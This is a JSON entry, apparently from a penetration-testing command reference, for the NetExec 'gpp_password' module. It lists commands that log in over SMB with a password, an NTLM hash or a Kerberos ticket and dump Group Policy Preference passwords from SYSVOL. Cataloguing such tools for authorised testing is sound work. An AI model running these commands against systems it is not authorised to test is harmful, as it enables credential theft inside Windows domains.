{
  "id": "nxc-smb-gpp-password",
  "name": "NetExec SMB GPP Password",
  "command": "nxc smb '<ip>' -u '<user>' -p '<password>' -M gpp_password",
  "description": "Search SYSVOL for Group Policy Preference XML files containing encrypted passwords",
  "platform": "linux",
  "requires": [
    "password"
  ],
  "protocols": [
    "smb"
  ],
  "tags": [
    "nxc",
    "smb",
    "gpp",
    "group-policy",
    "sysvol",
    "credential-dumping"
  ],
  "variations": [
    {
      "label": "NTLM Hash",
      "requires": "hash",
      "command": "nxc smb '<ip>' -u '<user>' -H '<hash>' -M gpp_password"
    },
    {
      "label": "Kerberos Ticket",
      "requires": "ticket",
      "command": "nxc smb '<ip>' -u '<user>' --use-kcache -M gpp_password"
    }
  ],
  "examples": [
    "nxc smb '192.168.1.100' -u 'user' -p 'password' -M gpp_password"
  ]
}
